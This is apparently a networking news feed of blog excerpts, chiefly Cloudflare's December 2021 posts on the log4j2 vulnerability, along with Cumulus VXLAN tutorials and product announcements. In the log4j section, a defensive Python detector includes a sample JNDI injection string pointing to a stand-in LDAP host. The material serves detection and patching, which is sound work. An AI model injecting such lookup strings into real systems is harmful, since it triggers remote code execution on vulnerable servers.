How Cloudflare security responded to log4j2 vulnerability

At Cloudflare, when we learn about a new security vulnerability, we quickly bring together teams to answer two distinct questions: (1) what can we do to ensure our customers’ infrastructures are protected, and (2) what can we do to ensure that our own environment is secure. Yesterday, December 9, 2021, when a serious vulnerability in the popular Java-based logging package log4j was publicly disclosed, our security teams jumped into action to help respond to the first question and answer the second question. This post explores the second.

We cover the details of how this vulnerability works in a separate blog post: Inside the log4j2 vulnerability (CVE-2021-44228), but in summary, this vulnerability allows an attacker to execute code on a remote server. Because of the widespread use of Java and Log4j, this is likely one of the most serious vulnerabilities on the Internet since both Heartbleed and ShellShock. The vulnerability is listed as CVE-2021-44228. The CVE description states that the vulnerability affects Log4j2 <=2.14.1 and is patched in 2.15. The vulnerability additionally impacts all versions of log4j 1.x; however, it is End of Life and has other security vulnerabilities that will not be fixed. Upgrading Continue reading

Secure how your servers connect to the Internet today

The vulnerability disclosed yesterday in the Java-based logging package, log4j, allows attackers to execute code on a remote server. We’ve updated Cloudflare’s WAF to defend your infrastructure against this 0-day attack. The attack also relies on exploiting servers that are allowed unfettered connectivity to the public Internet. To help solve that challenge, your team can deploy Cloudflare One today to filter and log how your infrastructure connects to any destination.

Securing traffic inbound and outbound



You can read about the vulnerability in more detail in our analysis published earlier today, but the attack starts when an attacker adds a specific string to input that the server logs. Today’s updates to Cloudflare’s WAF block that malicious string from being sent to your servers. We still strongly recommend that you patch your instances of log4j immediately to prevent lateral movement.

If the string has already been logged, the vulnerability compromises servers by tricking them into sending a request to a malicious LDAP server. The destination of the malicious server could be any arbitrary URL. Attackers who control that URL can then respond to the request with arbitrary code that the server can execute.
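As a rough illustration of the kind of string involved, the sketch below flags input that contains a plain JNDI lookup such as `${jndi:ldap://...}`. It is not Cloudflare's WAF rule. The pattern, the function names, and the sample field names are assumptions made for this example, and real payloads are frequently obfuscated in ways a check this simple will miss.

```python
import re
from typing import Dict, List

# Hypothetical, deliberately simple pattern: "${jndi:" followed by a scheme
# such as ldap, ldaps, rmi, or dns. Obfuscated payloads will evade it.
JNDI_LOOKUP = re.compile(r"\$\{jndi:(ldap|ldaps|rmi|dns)://", re.IGNORECASE)


def looks_like_jndi_lookup(value: str) -> bool:
    """Return True if the value contains a plain JNDI lookup string."""
    return JNDI_LOOKUP.search(value) is not None


def scan_request_fields(fields: Dict[str, str]) -> List[str]:
    """Return the names of the fields whose values contain a JNDI lookup."""
    return [name for name, value in fields.items() if looks_like_jndi_lookup(value)]


if __name__ == "__main__":
    # Made-up request fields, for illustration only.
    sample = {
        "User-Agent": "${jndi:ldap://example.invalid/a}",
        "Path": "/index.html",
    }
    print(scan_request_fields(sample))
```

A check like this is only useful for spotting unobfuscated probes in logs or request fields. It does not replace patching log4j.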

At the time of this blog, it Continue reading

Actual CVE-2021-44228 payloads captured in the wild

I wrote earlier about how to mitigate CVE-2021-44228 in Log4j, how the vulnerability came about and Cloudflare’s mitigations for our customers. As I write we are rolling out protection for our FREE customers as well because of the vulnerability’s severity.

As we now have many hours of data on scanning and attempted exploitation of the vulnerability, we can start to look at actual payloads being used in the wild and at statistics. Let’s begin with requests that Cloudflare is blocking through our WAF.



We saw a slow ramp up in blocked attacks this morning (times here are UTC) with the largest peak at around 1800 (roughly 20,000 blocked exploit requests per minute). But scanning has been continuous throughout the day. We expect this to continue.



We also took a look at the number of IP addresses that the WAF was blocking. Somewhere between 200 and 400 IPs appear to be actively scanning at any given time.



So far today the largest number of scans or exploitation attempts have come from Canada and then the United States.

Lots of the blocked requests appear to be in the form of reconnaissance to see if a server is actually exploitable. The top blocked exploit string Continue reading

The “Don’t Repeat Yourself” DRY Principle For Infrastructure as Code With Tim Davis @vTimD

Tim Davis of env0 joins Ned Bellavance & Ethan Banks of the Day Two Cloud podcast in this clip from the December 8, 2021 episode. We discuss the coding principle of “don’t repeat yourself” aka DRY, and how it helps make Infrastructure-as-Code suck less. https://daytwocloud.io You can subscribe to […]

The post The “Don’t Repeat Yourself” DRY Principle For Infrastructure as Code With Tim Davis @vTimD appeared first on Packet Pushers.

Inside the log4j2 vulnerability (CVE-2021-44228)

Yesterday, December 9, 2021, a very serious vulnerability in the popular Java-based logging package Log4j was disclosed. This vulnerability allows an attacker to execute code on a remote server; a so-called Remote Code Execution (RCE). Because of the widespread use of Java and log4j this is likely one of the most serious vulnerabilities on the Internet since both Heartbleed and ShellShock.

It is CVE-2021-44228 and affects version 2 of log4j between versions 2.0-beta-9 and 2.14.1. It is not present in version 1 of log4j and is patched in 2.15.0.
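The version range above can be turned into a quick check. This is a minimal sketch, assuming plain `major.minor[.patch]` version strings. The function names are hypothetical, and pre-release suffixes such as `-beta-9` are ignored, so every 2.0 pre-release is conservatively treated as affected.

```python
import re
from typing import Optional, Tuple


def parse_version(version: str) -> Optional[Tuple[int, int, int]]:
    """Parse 'major.minor[.patch]' and ignore any suffix such as '-beta-9'."""
    match = re.match(r"^(\d+)\.(\d+)(?:\.(\d+))?", version)
    if match is None:
        return None
    return int(match.group(1)), int(match.group(2)), int(match.group(3) or 0)


def is_affected(version: str) -> Optional[bool]:
    """Return True if the version falls in the range stated in this post.

    Returns None when the version string cannot be parsed.
    """
    parsed = parse_version(version)
    if parsed is None:
        return None
    # Stated range: 2.0-beta-9 through 2.14.1 affected, 2.15.0 patched.
    # Simplification: all 2.0 pre-releases count as affected.
    return (2, 0, 0) <= parsed <= (2, 14, 1)


if __name__ == "__main__":
    for candidate in ["1.2.17", "2.0-beta-9", "2.14.1", "2.15.0"]:
        print(candidate, is_affected(candidate))
```

Comparing tuples of integers avoids the common mistake of comparing version strings lexically, where "2.9" would sort after "2.14".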

In this post we explain the history of this vulnerability, how it was introduced, and how Cloudflare is protecting our clients. Details of actual attempted exploitation we are seeing blocked by our firewall service are in a separate blog post.

Cloudflare uses some Java-based software and our teams worked to ensure that our systems were not vulnerable or that this vulnerability was mitigated. In parallel, we rolled out firewall rules to protect our customers.

But, if you work for a company that is using Java-based software that uses log4j you should immediately read the section on how to mitigate and protect your systems before reading the rest.

Continue reading

Heavy Networking 610: Network Automation With Nautobot

On today's Heavy Networking we discuss Nautobot, an open-source software tool that can serve as a source of truth for network automation. We explore how Nautobot works, what it's used for, how it ties in with Python and Ansible, major features, and more.

Is Disaggregation Going to Be Cord Cutting for the Enterprise?

There’s a lot of talk in the networking industry around disaggregation. The basic premise is that by decoupling the operating system from the hardware you can gain the freedom to run the devices you want from any vendor with the software that does what you want it to do. You can standardize or mix-and-match as you see fit. You gain the ability to direct the way your network works and you control how things will be going forward.

To me it sounds an awful lot like the trend of “cutting the cord” or unsubscribing from cable TV service and picking and choosing how you want to consume your content. Ten years ago the idea of getting rid of your cable TV provider was somewhat crazy. In 2021 it seems almost a given that you no longer need to rely on your cable provider for entertainment. However, just like with the landscape of the post-cable cutting world, I think disaggregation is going to lead to a vastly different outcome than expected.

TNSTAAFL

Let’s get one thing out of the way up front: This idea of “freedom” when it comes to disaggregation and cord cutting is almost always about money. Yes, you Continue reading

Hedge 111: Machine Learning and Security with Micah Mussler

Machine Learning (ML) and Artificial Intelligence (AI) are all the rage in the network engineering world. Where might these technologies be useful, as opposed to mere hype? The two most obvious areas where AI and ML would be useful are failure reaction and security. Micah Mussler joins Tom Ammon and Russ White to discuss the possibilities of using AI and/or ML in the broader security market—and focusing in on the network.

Cloudflare One helps optimize user connectivity to Microsoft 365

We are excited to announce that Cloudflare has joined the Microsoft 365 Networking Partner Program (NPP). Cloudflare One, which provides an optimized path for traffic from Cloudflare customers to Microsoft 365, recently qualified for the NPP by demonstrating that on-ramps through Cloudflare’s network help optimize user connectivity to Microsoft.

Connecting users to the Internet on a faster network

Customers who deploy Cloudflare One give their team members access to the world’s fastest network, on average, as their on-ramp to the rest of the Internet. Users connect from their devices or offices and reach Cloudflare’s network in over 250 cities around the world. Cloudflare’s network accelerates traffic to its final destination through a combination of intelligent routing and software improvements.

We’re also excited that, in many cases, the final destination that a user visits already sits on Cloudflare’s network. Cloudflare serves over 28M HTTP requests per second, on average, for the millions of customers who secure their applications on our network. When those applications do not run on our network, we can rely on our own global private backbone and our connectivity with over 10,000 networks globally to connect the user.

For Microsoft 365 traffic, we focus on breaking out Continue reading

Argo for Packets is Generally Available

What would you say if we told you your IP network can be faster by 10%, and all you have to do is reach out to your account team to make it happen?

Today, we’re announcing the general availability of Argo for Packets, which provides IP layer network optimizations to supercharge your Cloudflare network services products like Magic Transit (our Layer 3 DDoS protection service), Magic WAN (which lets you build your own SD-WAN on top of Cloudflare), and Cloudflare for Offices (our initiative to provide secure, performant connectivity into thousands of office buildings around the world).

If you’re not familiar with Argo, it’s a Cloudflare product that makes your traffic faster. Argo finds the fastest, most available path for your traffic on the Internet. Every day, Cloudflare carries trillions of requests, connections, and packets across our network and the Internet. Because our network, our customers, and their end users are well distributed globally, all of these requests flowing across our infrastructure paint a great picture of how different parts of the Internet are performing at any given time. Cloudflare leverages this picture to ensure that your traffic takes the fastest path through our infrastructure.

Previously, Argo optimized traffic at Continue reading

Cloudflare announces integrations with MDM companies

At Cloudflare, we are continuously thinking about ways to make the Internet more secure, more reliable and more performant for consumers and businesses of all sizes. Connecting devices safely to applications is critical for the safety of enterprise applications and for the peace of mind of a CIO.

Last January, we launched our Zero Trust platform, Cloudflare for Teams, that protects users, their devices, and their data by replacing legacy security perimeters with Cloudflare’s global edge network. Cloudflare for Teams makes security solutions like Zero Trust Network Access and Secure Web Gateway more accessible, for all companies, regardless of size, scale, or resources. This means building products that are more user-friendly, easier to deploy, and less cumbersome to manage.

The Cloudflare WARP agent encrypts traffic from devices to Cloudflare’s network, and many customers use it as a critical component to extend default-deny controls to where their users are. Today, Cloudflare is rolling out richer documentation on how to deploy WARP with these partners, so your administrators have a streamlined, easy-to-follow process to enroll your entire device fleet.

And we’re excited to announce new integrations with mobile device management vendors Microsoft Intune, Ivanti, JumpCloud, Kandji, and Hexnode to make it Continue reading

Cloudflare Agent — Seamless Deployment at Scale

A year ago we launched WARP for Desktop to give anyone a fast, private on-ramp to the Internet. For our business customers, IT and security administrators can also use that same agent and enroll the devices in their organization into Cloudflare for Teams. Once enrolled, their team members have an accelerated on-ramp to the Internet where Cloudflare can also provide comprehensive security filtering from network firewall functions all the way to remote browser isolation.

When we launched last year, we supported the broadest possible deployment mechanisms with a simple set of configuration options to get your organization protected quickly. We focused on helping organizations keep users and data safe with HTTP and DNS filtering from any location. We started with support for Mac, Windows, iOS, and Android.

Since that launch, thousands of organizations have deployed the agent to secure their team members and endpoints. We’ve heard from customers who are excited to expand their rollout, but need more OS support and greater control over the configuration.

Today we are excited to announce our zero trust agent now has feature parity across all major platforms. Beyond that, you can control new options to determine how traffic is routed and your administrators Continue reading

Introducing Cloudflare Domain Protection — Making Domain Compromise a Thing of the Past

Everything on the web starts with a domain name. It is the foundation on which a company’s online presence is built. If that foundation is compromised, the damage can be immense.

As part of CIO Week, we looked at all the biggest risks that companies continue to face online, and how we could address them. The compromise of a domain name remains one of the greatest. There are many ways in which a domain may be hijacked or otherwise compromised, all the way up to the most serious: losing control of your domain name altogether.

You don’t want it to happen to you. Imagine not just losing your website, but all your company’s email, a myriad of systems tied to your corporate domain, and who knows what else. Having an attacker compromise your corporate domain is the stuff of nightmares for every CIO. And, if you’re a CIO and it’s not something you’re worrying about, know that we literally surveyed every other domain registrar and were so unsatisfied with their security practices we needed to launch our own.

But, now that we have, we want to make domain compromise something that should never, ever happen again. For that reason, we’re Continue reading

Cumulus Part X – VXLAN EVPN and MLAG

In this post, we take a look at the interaction of MLAG with an EVPN based VXLAN fabric on Cumulus Linux.

Cumulus Part IX – Understanding VXLAN EVPN Route-Target control

In this post, we look at how route-target extended communities can be used to control VXLAN BGP EVPN routes in Cumulus Linux.

Cumulus Basics Part VIII – VXLAN symmetric routing and multi-tenancy

In this post, we look at VXLAN routing with symmetric IRB and multi-tenancy on Cumulus Linux.

Cumulus Basics Part VII – VXLAN routing – asymmetric IRB

In this post, we look at VXLAN routing with asymmetric IRB on Cumulus Linux.

Cumulus Basics Part VI – VXLAN L2VNIs with BGP EVPN

In this post, we introduce BGP EVPN and a VXLAN fabric in Cumulus Linux, with L2VNIs.

Cumulus Basics Part V – BGP unnumbered

In this post, we’ll look at BGP unnumbered on Cumulus Linux.

Cumulus Basics Part IV – BGP introduction

In this post, we introduce BGP on Cumulus Linux.